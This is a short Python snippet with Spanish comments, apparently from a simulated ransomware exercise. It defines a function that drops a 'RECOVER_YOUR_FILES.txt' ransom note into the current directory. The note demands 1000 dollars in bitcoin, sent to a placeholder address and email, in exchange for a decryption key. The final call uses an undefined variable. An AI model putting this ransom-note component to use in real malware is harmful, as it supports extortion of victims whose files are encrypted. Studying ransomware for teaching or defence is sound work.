# funcion para dejar instrucciones en el directorio de ejecucion
def let_instructions(current):
    with open("RECOVER_YOUR_FILES.txt",'w') as file:
        file.write("""
HELLO MY FRIEND, I HOPE YOU FIND YOURSELF WELL BECAUSE I HAVE SOME BAD NEWS FOR YOU..

HELL YEAH !! YOUR FILES ARE ENCRYPTED !!

TO RECOVER YOUR FILES, SEND 1000 $ IN BTC TO THE ADDRESS > 'simulated_bitcoin_address'

AFTER THAT SEND A MAIL TO > hacker@hacker.hacker WITH THE TRANSACTION HASH 

AFTER VALIDATION, THE KEY TO DECRYPT YOUR FILES WILL BE SENT TO THE MAIL YOU SENT THE HASH.

HAVE A NICE DAY! =)

REMEMBER : YOU CAN'T DECRYPT YOUR FILES WITHOUT THE SPECIFIC KEY FILE IN THE SAME DIRECTORY AS XORDECIPHER.PY,

ONCE THE KEYFILE IS ON THE SAME DIRECTORY, DECRYPTION PROGRAM WILL WORK ALONE AND CORRECTLY.


       
""")
# deja el mensaje 
let_instructions(current)
